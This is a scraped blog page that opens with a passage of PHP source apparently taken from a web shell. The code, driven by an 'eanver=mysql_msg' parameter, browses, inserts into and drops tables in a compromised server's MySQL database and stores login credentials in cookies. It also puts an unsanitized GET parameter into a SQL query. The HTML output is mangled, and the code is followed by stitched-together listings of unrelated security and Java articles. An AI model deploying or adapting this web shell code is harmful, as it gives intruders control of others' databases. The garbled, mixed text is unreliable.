                    for ($i = 0; $i < $fieldnum; $i++) {
                        $name = @mysql_field_name($result, $i);
                        $type = @mysql_field_type($result, $i);
                        $len = @mysql_field_len($result, $i);
                        echo "
" . $name . " " . $type . '(' . $len . ")
";
                    }
                    echo "
"
;
                } else {
                    $query = "SHOW TABLE STATUS";
                    $status = @mysql_query($query, $conn);
                    while ($statu = @mysql_fetch_array($status)) {
                        $statusize[] = $statu['Data_length'];
                        $statucoll[] = $statu['Collation'];
                    }
                    $query = "SHOW TABLES FROM " . $_GET['db'] . ';';
                    echo "
"; $result = @mysql_query($query, $conn); $k = 0; while ($table = @mysql_fetch_row($result)) { $charset = substr($statucoll[$k], 0, strpos($statucoll[$k], '_')); echo ""; echo ""; echo '" . "\r\n"; $k++; } echo "
表名 操作 字符集 大小
. $_GET['db'] . "&table=" . $table[0] . '">' . $table[0] . " . $_GET['db'] . '&insert=' . $table[0] . "\"> 插入 . $table[0] . "','?eanver=mysql_msg&db=" . $_GET['db'] . '&drop=' . $table[0] . "');return false;\"> 删除 ' . $statucoll[$k] . "" . File_Size($statusize[$k]) . "
"; } } } else { $cookietime = time() - 6 * 3600; setcookie($cookie_name_mysql . 'host', "", $cookietime); setcookie($cookie_name_mysql . 'port', "", $cookietime); setcookie($cookie_name_mysql . 'user', "", $cookietime); setcookie($cookie_name_mysql . 'pass', "", $cookietime); die("连接MYSQL失败,请重新登陆."); } /*if (!$BOOL and addslashes($query) != '') echo "";*/ break; default: html_main(); break; } css_foot(); ob_end_flush();

你可能感兴趣的:(WEB安全学习笔记)

  • web安全学习笔记(1) 头发的天敌是代码 web安全学习笔记web安全学习笔记
    一、网络安全分支1.web安全——网站2.二进制安全物联网安全工控安全二、网站是如何搭建起来的1.服务器服务器与我们的家庭使用电脑有什么区别?①没有显卡②CPU+内存不同于家庭电脑2.操作系统家庭系统:WindowsXPWindows7Windows8Windows9Windows10Windows11服务器操作系统:Windows2000Windows2003Windows2008Windows
  • web安全学习笔记【05】——反弹Shell、正反向连接 Sarahie 学习笔记web安全linux学习笔记
    思维导图#知识点:1、Web常规-系统&中间件&数据库&源码等2、Web其他-前后端&软件&Docker&分配站等3、Web拓展-CDN&WAF&OSS&反向&负载均衡等-----------------------------------1、APP架构-封装&原生态&H5&flutter等2、小程序架构-Web&H5&JS&VUE框架等------------------------------
  • web安全学习笔记【10】——数据包分析 Sarahie 学习笔记web安全学习笔记
    基础[1][2][3][4]入门-HTTP数据包&Postman构造&请求方法&请求头修改&状态码判断[5][6][7]#知识点:1、Web常规-系统&中间件&数据库&源码等2、Web其他-前后端&软件&Docker&分配站等3、Web拓展-CDN&WAF&OSS&反向&负载均衡等-----------------------------------1、APP架构-封装&原生态&H5&flutte
  • web安全学习笔记【08】——算法1 Sarahie 学习笔记学习web安全笔记
    思维导图在最后#知识点:1、Web常规-系统&中间件&数据库&源码等2、Web其他-前后端&软件&Docker&分配站等3、Web拓展-CDN&WAF&OSS&反向&负载均衡等-----------------------------------1、APP架构-封装&原生态&H5&flutter等2、小程序架构-Web&H5&JS&VUE框架等---------------------------
  • WEB安全学习笔记 小陈要努力学 phpasp.nethtml
    基础入门1.基础入门——基础概念域名什么是域名域名(英语:DomainName),又称网域,是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时对计算机的定位标识(有时也指地理位置)由于IP地址具有不方便记忆并且不能显示地址组织的名称和性质等缺点,人们设计出了域名,并通过网域名称系统(DNS,DomainNameSystem)来将域名和IP地址相互映射,使人
  • web安全学习笔记【09】——算法2 Sarahie 学习笔记学习web安全
    基础[1]入门-算法逆向&散列对称非对称&JS源码逆向&AES&DES&RSA&SHA#知识点:1、Web常规-系统&中间件&数据库&源码等2、Web其他-前后端&软件&Docker&分配站等3、Web拓展-CDN&WAF&OSS&反向&负载均衡等-----------------------------------1、APP架构-封装&原生态&H5&flutter等2、小程序架构-Web&H5&
  • web安全学习笔记【06】——http\https抓包 Sarahie 学习笔记httpweb安全学习
    思维导图放最后#知识点:1、Web常规-系统&中间件&数据库&源码等2、Web其他-前后端&软件&Docker&分配站等3、Web拓展-CDN&WAF&OSS&反向&负载均衡等-----------------------------------1、APP架构-封装&原生态&H5&flutter等2、小程序架构-Web&H5&JS&VUE框架等---------------------------
  • web安全学习笔记【07】——非http\https抓包 Sarahie 学习笔记web安全学习
    #知识点:1、Web常规-系统&中间件&数据库&源码等2、Web其他-前后端&软件&Docker&分配站等3、Web拓展-CDN&WAF&OSS&反向&负载均衡等-----------------------------------1、APP架构-封装&原生态&H5&flutter等2、小程序架构-Web&H5&JS&VUE框架等----------------------------------
  • Web安全学习资料(收藏) Rnan-prince 网络安全web渗透测试安全web
    1、Web安全学习笔记网址:Web安全学习笔记—Web安全学习笔记1.0文档2、条目详情-FreeBuf网络安全行业门户https://wiki.freebuf.com/detail?wiki=19&post=2749603、视频学习笔记·语雀视频学习笔记·语雀4、渗透测试体系化学习笔记-随笔分类-九~月-博客园渗透测试体系化学习笔记-随笔分类-九~月-博客园5、【小迪安全】视频2021最新web
  • 这份网络安全入门笔记(共327页),助你步入安全门槛 程序员小芽 安全web安全笔记
    前言随着Web技术发展越来越成熟,而非Web服务越来越少的暴露在互联网上,现在互联网安全主要指的是Web安全。为了自身不“裸奔”在大数据里,渐渐开始学习Web安全,在学习Web安全的过程中,发现很大一部分知识点都相对零散,如果没有相对清晰的脉络作为参考,会给学习带来一些不必要的负担。于是之后就把一些知识、想法整理记录下来,最后形成了这份《Web安全学习笔记》。这份文档共11个章节327页,对网络协
  • 【精选】2023网络安全学习路线 非常详细 推荐学习 Python栈机 web安全学习安全
    关键词:网络安全入门、渗透测试学习、零基础学安全、网络安全学习路线分享2套零基础、进阶学习网络安全/渗透测试教程第一套是Web安全学习笔记,共430页12个章节。该笔记详细介绍了计算机网络协议、信息收集、常见漏洞、内网渗透、御用技术等等,全文全面成体系,通俗易懂,涵盖了零基础学员从入门到进阶需要掌握的核心知识点,实操性极强,感兴趣的朋友可以看一下。第二套是web安全零基础学习视频教程首先咱们聊聊,
  • Web安全学习笔记 Ekolia
    之前做项目写的那叫一个随意。。由于都是小项目和练手demo,完全没有管过安全相关方面的知识。。回头重新总结一下吧目前比较常见的安全问题大概有这几种:XSSCrossSiteScript跨站脚本攻击CSRFCross-siterequestforgery跨站请求伪造SQL注入DDOSDistributedDenialofService分布式拒绝服务比较少见的,还是了解一下的:iframe风险上传漏洞
  • 2023网络安全学习路线 非常详细 推荐学习 万天峰 网络安全安全web安全web安全学习安全
    关键词:网络安全入门、渗透测试学习、零基础学安全、网络安全学习路线分享2套零基础、进阶学习网络安全/渗透测试教程点击此处即可获得网络安全教程第一套是Web安全学习笔记,共430页12个章节。该笔记详细介绍了计算机网络协议、信息收集、常见漏洞、内网渗透、御用技术等等,全文全面成体系,通俗易懂,涵盖了零基础学员从入门到进阶需要掌握的核心知识点,实操性极强,感兴趣的朋友可以看一下。第二套是web安全零基
  • Web安全入门笔记(共327页),快速入门网络安全(黑客) IT老涵 web安全笔记安全
    前言随着Web技术发展越来越成熟,而非Web服务越来越少的暴露在互联网上,现在互联网安全主要指的是Web安全。为了自身不“裸奔”在大数据里,渐渐开始学习Web安全,在学习Web安全的过程中,发现很大一部分知识点都相对零散,如果没有相对清晰的脉络作为参考,会给学习带来一些不必要的负担。于是之后就把一些知识、想法整理记录下来,最后形成了这份《Web安全学习笔记》。这份文档共11个章节327页,对网络协
  • web安全自学笔记 网络安全-生 零基础学网络安全学习路线计算机网络web安全网络安全网络安全技能树编程
    Web安全方面的基本知识是有很必要的,未必就要深入理解。本文主要介绍常见的网络攻击类型,不作深入探讨。正文网络攻击的形式种类繁多,从简单的网站敏感文件扫描、弱口令暴力破解,到SQL注入,再到复杂的网络劫持等,种类万千。本文只介绍以下两种攻击:XSS攻击CSRF攻击如果你对其他更高大上的网络攻击有兴趣,可以点击这里:Web安全学习笔记-高级网络攻击。XSS攻击XSS,跨站脚本攻击(CrossSite
  • Web安全学习笔记二 计算机网络与协议 _abcdef Web安全网络基础TCP/UDP协议包HTTP协议簇路由算法/域名系统
    文章目录计算机网络协议1.1网络基础1.1.1计算机通信网的组成1.1.2通信协议1.1.3OSI七层模型1.1.3.1物理层1.1.3.2数据链路层1.1.3.3网络层1.1.3.4传输层1.1.3.5会话层1.1.3.6表示层1.1.3.7应用层1.1.3.8总结1.2UDP协议1.2.1主要特点1.2.2UDP数据格式与包结构1.3TCP协议1.3.1简介1.3.2TCP包结构1.3.3三次
  • web安全学习笔记--基础入门 光迹ovo web安全
    一、名词1.DNS(域名系统):将域名和IP地址相互映射的一个分布式数据库,便于用户访问;UDP/TCP端口为53,利用cmd中ping命令可以查看域名所对应的ip号2.CDN(内容分发网络):将网络的流量尽可能均匀分配到几个能完成相同任务的服务器或网络节点上,由此来避免部分网络节点过载3.hosts文件:将ip与域名建立关联数据库,登录网页时若设置了关系,计算机将先从此文件中将网址提交DNS域名
  • 零基础Web安全学习笔记 网络安全进阶 渗透测试web安全渗透测试网络安全学习安全
    内容索引:1.序章1.1.Web技术演化1.2.网络攻防技术演化1.3.网络安全观1.4.法律与法规2.计算机网络与协议2.1.网络基础2.2.UDP协议2.3.TCP协议2.4.DHCP协议2.5.路由算法2.6.域名系统2.7.HTTP协议簇2.8.邮件协议族2.9.SSL/TLS2.10.IPsec2.11.Wi-Fi3.信息收集3.1.网络入口/信息3.2.域名信息3.3.端口信息3.4.
  • Web安全学习笔记 SQL注入下 maoyin
    Web安全学习笔记SQL注入下繁枝插云欣——ICML8SQL注入小技巧CheatSheet预编译参考文章一点心得一.SQL注入小技巧1.宽字节注入一般程序员用gbk编码做开发的时候,会用setnames'gbk'来设定,这句话等同于setcharacter_set_
  • web安全学习笔记(5) 暴走の小熊猫 web安全学习笔记
    服务器远程管理一、远程管理类型Windows远程管理有2种类型:1、远程桌面(圆形)2、telnet(命令行)二、远程桌面拓扑图步骤:1、首先将配置网络,并实现客户机与服务器可以互通2、服务器开启允许被远程控制:桌面右键属性–远程设置–选择允许–确定3、客户机上:开始--运行--输入mstsc打开远程连接工具4、在mstsc工具上输入服务器的IP并点击确定5、输入服务器的账号和密码注意:如使用非管
  • web安全学习笔记(一) OWASPBWA--靶机搭建 qycc3391 web安全学习笔记安全web
    为了学习web安全,需要搭建一个用来攻击的靶机,OWASP,OpenWebApplicationSecurityProject,提供了许多用于学习安全学习的项目。这里使用TheBrokenWebApplications(BWA)Project,提供一个虚拟机的克隆,包含了含有漏洞的网站,可以使用vmwareworkstation打开。此项目的优点是,直接提供了虚拟机的克隆,可以直接打开,无需复杂的
  • web安全学习笔记(八) XSS之cookie劫持 qycc3391 web安全学习笔记xsscookie安全漏洞session
    上一文中提到XSS的分类,本文将演示如何通过XSS进行cookie劫持,并且伪装登录。再cookie劫持中,有三种身份,分别是服务器,普通用户以及攻击者。这里使用本机和两台台虚拟机完成这项工作。基本思路如图所示:首先,攻击者发现某个网站存在XSS漏洞,于是编写恶意代码。当用户访问带有恶意代码的网站时,会将通过恶意代码,将cookie发送给攻击者。当攻击者获取cookie后,便可以使用cookie进
  • web安全学习笔记(七) XSS(Cross-site scripting)跨站脚本漏洞 qycc3391 web安全学习笔记
    1.XSS原理解析HTML中,有着标签,用于定义客户端脚本。在与之间输入代码,即可实现一些特殊效果。例如,新建两个文件,xxstest.html和PrintSrc.php两个文件:alert(/xss/)时,就会触发XSS攻击:为什么网页不会像abd那样打印alert(/xss/),而是弹出了提示框呢?这是因为alert(/xss/)被包含在script标签中,标签中的内容被解析了,这就是XSS漏
  • web安全学习笔记(九)CSRF(Cross-Site Request Forgery) 跨站请求伪造 qycc3391 web安全学习笔记
    0.前言CRSF是建立在会话之上的,听起来非常像XSS跨站脚本攻击,但是实际上攻击方式完全不同。之前在写XSS时,提到很多网站会使用cookie来保存用户登录的信息,例如昨天晚上我使用完CSDN后,关闭浏览器,关闭电脑,今天打开CSDN时,虽然没有填写账户和密码,也会自动登陆。那么CRSF可以做到什么呢?比如A登陆了网上银行,正在准备进行一个操作,然而有攻击者给他发送了一个链接,当A点击这条URL
  • web安全学习笔记之-脚本安全 sailtoyouSCU web安全
    浏览器安全浏览器很强大但是也不是那么神秘,本质上就是一个客户端或者终端APP。因为实现了一系列标准的协议文件,而拥有了这个特殊的地位。作为一名大公司里专职后台的同学,涉足前端工作较少,我们对浏览器的了解程度、对安全问题的重视还不够。以前了解的一些基本概念如跨域,今天总算知道为啥而来:同源策略浏览器判断同源的根据是:host、子域、端口、协议。这些因素里有一个不同就认为不同源对于js文件引入来说,文
  • web安全学习笔记之-认证和会话管理-访问控制 sailtoyouSCU web安全
    密码是验证主人最简单常用的手段网站要避免存密码的明文,CSDN被拖裤后,密码是明文的非常悲剧。密码必须用md5或者sha哈希后存起来,验证密码也是比较哈希值就可以了。md5是不可逆的。但是彩虹表这种穷举法已经用于MD5的破解,但是只要网站在计算哈希的时候简单加一个私密字符串就可以对彩虹表取明文带来难度支付网站除了密码,还用了多中手段去认证:动态口令、数字证书、第三方等。黑客很难取得所有渠道的认证方
  • web安全学习笔记之-文件上传漏洞 sailtoyouSCU web安全
    文件上传在web服务里非常普遍上传附件、图片、文本都很多啦。上传文件漏洞指的是上传web脚本且能被web服务器解析上传文件必须能被解释执行且在web容器能执行的路径里服务器如果仅仅根据文件名来判断文件的类型,则很容易利用0截断功能绕过例如xxx.php伪造成xxx.php\0.jpg一般php的文件名处理结果是.jpg除了看后缀还要看数据的head内容是否符合。当然文件头也可以伪造。但是只要执行的
  • web安全学习笔记-加密算法 sailtoyouSCU web安全
    加密算法分两类1、分组加密算法DES3-DESIDEAAESBLOWFISH2、流加密算法RC4ORYXSEALhttp://www.cnblogs.com/happyhippy/archive/2006/12/23/601353.html分组加密也分四种模式(ECB、CBC、CFB、OFB)对于这几种模式的区别在于衡量他们在明文攻击、并行计算、误差传递等指标的表现对流密码加密的攻击流密码主要原理
  • web安全学习笔记之-注入攻击 sailtoyouSCU web安全
    前面有很多攻击细节都是讲html、浏览器、javascript的这一章节比较偏后端。注入攻击的本质就是用户输入的数据当作代码去执行了。1、用户能够控制输入2、程序要执行的代码拼接了用户的数据sql注入:例如要执行用户输入的查询条件xxxxselect*fromtableawherea=xxxx;但是如果输入的xxxx是恶意的,变成了xxxx;droptabletablea;那么执行代码拼接了用户的
  • web安全学习笔记之-点击劫持 sailtoyouSCU web安全
    点击劫持原理本质就是利用iframe实现了障眼法这是比CSRF更高级的手法。可以通过一连串的欺骗让用户把需要交互的请求给伪造了。也有人用类似障眼法当作trick去实现正常功能的,印象中QQ邮箱的一个前端分享就介绍过这样的手法实现一个非常规大杀器功能。flash的点击劫持还能实现打开用户电脑的摄像头。图片劫持XSIO,用户输入的html代码里如果允许浮出来,位置如果调整到logo位置,会起到欺骗目的
  • sql统计相同项个数并按名次显示 朱辉辉33 javaoracle
    现在有如下这样一个表: A表 ID Name time ------------------------------ 0001 aaa 2006-11-18 0002 ccc 2006-11-18 0003 eee 2006-11-18 0004 aaa 2006-11-18 0005 eee 2006-11-18 0004 aaa 2006-11-18 0002 ccc 20
  • Android+Jquery Mobile学习系列-目录 白糖_ JQuery Mobile
    最近在研究学习基于Android的移动应用开发,准备给家里人做一个应用程序用用。向公司手机移动团队咨询了下,觉得使用Android的WebView上手最快,因为WebView等于是一个内置浏览器,可以基于html页面开发,不用去学习Android自带的七七八八的控件。然后加上Jquery mobile的样式渲染和事件等,就能非常方便的做动态应用了。   从现在起,往后一段时间,我打算
  • 如何给线程池命名 daysinsun 线程池
            在系统运行后,在线程快照里总是看到线程池的名字为pool-xx,这样导致很不好定位,怎么给线程池一个有意义的名字呢。参照ThreadPoolExecutor类的ThreadFactory,自己实现ThreadFactory接口,重写newThread方法即可。参考代码如下:     public class Named
  • IE 中"HTML Parsing Error:Unable to modify the parent container element before the 周凡杨 html解析errorreadyState
      错误: IE 中"HTML Parsing Error:Unable to modify the parent container element before the child element is closed"     现象: 同事之间几个IE 测试情况下,有的报这个错,有的不报。经查询资料后,可归纳以下原因。
  • java上传 g21121 java
    我们在做web项目中通常会遇到上传文件的情况,用struts等框架的会直接用的自带的标签和组件,今天说的是利用servlet来完成上传。 我们这里利用到commons-fileupload组件,相关jar包可以取apache官网下载:http://commons.apache.org/ 下面是servlet的代码: //定义一个磁盘文件工厂 DiskFileItemFactory fact
  • SpringMVC配置学习 510888780 springmvc
    spring MVC配置详解 现在主流的Web MVC框架除了Struts这个主力 外,其次就是Spring MVC了,因此这也是作为一名程序员需要掌握的主流框架,框架选择多了,应对多变的需求和业务时,可实行的方案自然就多了。不过要想灵活运用Spring MVC来应对大多数的Web开发,就必须要掌握它的配置及原理。   一、Spring MVC环境搭建:(Spring 2.5.6 + Hi
  • spring mvc-jfreeChart 柱图(1) 布衣凌宇 jfreechart
    第一步:下载jfreeChart包,注意是jfreeChart文件lib目录下的,jcommon-1.0.23.jar和jfreechart-1.0.19.jar两个包即可; 第二步:配置web.xml; web.xml代码如下 <servlet>     <servlet-name>jfreechart</servlet-nam
  • 我的spring学习笔记13-容器扩展点之PropertyPlaceholderConfigurer aijuans Spring3
    PropertyPlaceholderConfigurer是个bean工厂后置处理器的实现,也就是BeanFactoryPostProcessor接口的一个实现。关于BeanFactoryPostProcessor和BeanPostProcessor类似。我会在其他地方介绍。PropertyPlaceholderConfigurer可以将上下文(配置文件)中的属性值放在另一个单独的标准java P
  • java 线程池使用 Runnable&Callable&Future antlove javathreadRunnablecallablefuture
    1. 创建线程池 ExecutorService executorService = Executors.newCachedThreadPool();   2. 执行一次线程,调用Runnable接口实现 Future<?> future = executorService.submit(new DefaultRunnable()); System.out.prin
  • XML语法元素结构的总结 百合不是茶 xml树结构
    1.XML介绍1969年   gml (主要目的是要在不同的机器进行通信的数据规范)1985年   sgml  standard generralized markup language1993年   html(www网)1998年  xml   extensible markup language
  • 改变eclipse编码格式 bijian1013 eclipse编码格式
    1.改变整个工作空间的编码格式         改变整个工作空间的编码格式,这样以后新建的文件也是新设置的编码格式。         Eclipse->window->preferences->General->workspace-
  • javascript中return的设计缺陷 bijian1013 JavaScriptAngularJS
    代码1: <script> var gisService = (function(window) { return { name:function () { alert(1); } }; })(this); gisService.name(); &l
  • 【持久化框架MyBatis3八】Spring集成MyBatis3 bit1129 Mybatis3
    pom.xml配置 Maven的pom中主要包括: MyBatis MyBatis-Spring Spring MySQL-Connector-Java Druid applicationContext.xml配置   <?xml version="1.0" encoding="UTF-8"?> &
  • java web项目启动时自动加载自定义properties文件 bitray javaWeb监听器相对路径
    创建一个类 public class ContextInitListener implements ServletContextListener 使得该类成为一个监听器。用于监听整个容器生命周期的,主要是初始化和销毁的。 类创建后要在web.xml配置文件中增加一个简单的监听器配置,即刚才我们定义的类。 <listener> <des
  • 用nginx区分文件大小做出不同响应 ronin47
    昨晚和前21v的同事聊天,说到我离职后一些技术上的更新。其中有个给某大客户(游戏下载类)的特殊需求设计,因为文件大小差距很大——估计是大版本和补丁的区别——又走的是同一个域名,而squid在响应比较大的文件时,尤其是初次下载的时候,性能比较差,所以拆成两组服务器,squid服务于较小的文件,通过pull方式从peer层获取,nginx服务于较大的文件,通过push方式由peer层分发同步。外部发布
  • java-67-扑克牌的顺子.从扑克牌中随机抽5张牌,判断是不是一个顺子,即这5张牌是不是连续的.2-10为数字本身,A为1,J为11,Q为12,K为13,而大 bylijinnan java
    package com.ljn.base; import java.util.Arrays; import java.util.Random; public class ContinuousPoker { /** * Q67 扑克牌的顺子 从扑克牌中随机抽5张牌,判断是不是一个顺子,即这5张牌是不是连续的。 * 2-10为数字本身,A为1,J为1
  • 翟鸿燊老师语录 ccii 翟鸿燊
    一、国学应用智慧TAT之亮剑精神A 1. 角色就是人格     就像你一回家的时候,你一进屋里面,你已经是儿子,是姑娘啦,给老爸老妈倒怀水吧,你还觉得你是老总呢?还拿派呢?就像今天一样,你们往这儿一坐,你们之间是什么,同学,是朋友。     还有下属最忌讳的就是领导向他询问情况的时候,什么我不知道,我不清楚,该你知道的你凭什么不知道
  • [光速与宇宙]进行光速飞行的一些问题 comsci 问题
         在人类整体进入宇宙时代,即将开展深空宇宙探索之前,我有几个猜想想告诉大家     仅仅是猜想。。。未经官方证实      1:要在宇宙中进行光速飞行,必须首先获得宇宙中的航行通行证,而这个航行通行证并不是我们平常认为的那种带钢印的证书,是什么呢? 下面我来告诉
  • oracle undo解析 cwqcwqmax9 oracle
    oracle undo解析2012-09-24 09:02:01     我来说两句       作者:虫师收藏    我要投稿 Undo是干嘛用的?         &nb
  • java中各种集合的详细介绍 dashuaifu java集合
    一,java中各种集合的关系图 Collection       接口的接口     对象的集合  ├ List           子接口   &n
  • 卸载windows服务的方法 dcj3sjt126com windowsservice
    卸载Windows服务的方法 在Windows中,有一类程序称为服务,在操作系统内核加载完成后就开始加载。这里程序往往运行在操作系统的底层,因此资源占用比较大、执行效率比较高,比较有代表性的就是杀毒软件。但是一旦因为特殊原因不能正确卸载这些程序了,其加载在Windows内的服务就不容易删除了。即便是删除注册表中的相 应项目,虽然不启动了,但是系统中仍然存在此项服务,只是没有加载而已。如果安装其他
  • Warning: The Copy Bundle Resources build phase contains this target's Info.plist dcj3sjt126com iosxcode
        http://developer.apple.com/iphone/library/qa/qa2009/qa1649.html Excerpt: You are getting this warning because you probably added your Info.plist file to your Copy Bundle
  • 2014之C++学习笔记(一) Etwo C++EtwoEtwoiterator迭代器
            已经有很长一段时间没有写博客了,可能大家已经淡忘了Etwo这个人的存在,这一年多以来,本人从事了AS的相关开发工作,但最近一段时间,AS在天朝的没落,相信有很多码农也都清楚,现在的页游基本上达到饱和,手机上的游戏基本被unity3D与cocos占据,AS基本没有容身之处。so。。。最近我并不打算直接转型
  • js跨越获取数据问题记录 haifengwuch jsonpjsonAjax
    js的跨越问题,普通的ajax无法获取服务器返回的值。   第一种解决方案,通过getson,后台配合方式,实现。 Java后台代码: protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { String ca
  • 蓝色jQuery导航条 ini JavaScripthtmljqueryWebhtml5
    效果体验:http://keleyi.com/keleyi/phtml/jqtexiao/39.htmHTML文件代码: <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>jQuery鼠标悬停上下滑动导航条 - 柯乐义<
  • linux部署jdk,tomcat,mysql kerryg jdktomcatlinuxmysql
    1、安装java环境jdk:     一般系统都会默认自带的JDK,但是不太好用,都会卸载了,然后重新安装。    1.1)、卸载:      (rpm -qa :查询已经安装哪些软件包;        rmp -q 软件包:查询指定包是否已
  • DOMContentLoaded VS onload VS onreadystatechange mutongwu jqueryjs
    1. DOMContentLoaded 在页面html、script、style加载完毕即可触发,无需等待所有资源(image/iframe)加载完毕。(IE9+) 2. onload是最早支持的事件,要求所有资源加载完毕触发。 3. onreadystatechange 开始在IE引入,后来其它浏览器也有一定的实现。涉及以下 document , applet, embed, fra
  • sql批量插入数据 qifeifei 批量插入
    hi,   自己在做工程的时候,遇到批量插入数据的数据修复场景。我的思路是在插入前准备一个临时表,临时表的整理就看当时的选择条件了,临时表就是要插入的数据集,最后再批量插入到数据库中。    WITH tempT AS ( SELECT item_id AS combo_id, item_id, now() AS create_date FROM a
  • log4j打印日志文件 如何实现相对路径到 项目工程下 thinkfreer Weblog4j应用服务器日志
    最近为了实现统计一个网站的访问量,记录用户的登录信息,以方便站长实时了解自己网站的访问情况,选择了Apache 的log4j,但是在选择相对路径那块 卡主了,X度了好多方法(其实大多都是一样的内用,还一个字都不差的),都没有能解决问题,无奈搞了2天终于解决了,与大家分享一下 需求: 用户登录该网站时,把用户的登录名,ip,时间。统计到一个txt文档里,以方便其他系统调用此txt。项目名
  • linux下mysql-5.6.23.tar.gz安装与配置 笑我痴狂 mysqllinuxunix
    1.卸载系统默认的mysql [root@localhost ~]# rpm -qa | grep mysql mysql-libs-5.1.66-2.el6_3.x86_64 mysql-devel-5.1.66-2.el6_3.x86_64 mysql-5.1.66-2.el6_3.x86_64 [root@localhost ~]# rpm -e mysql-libs-5.1
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他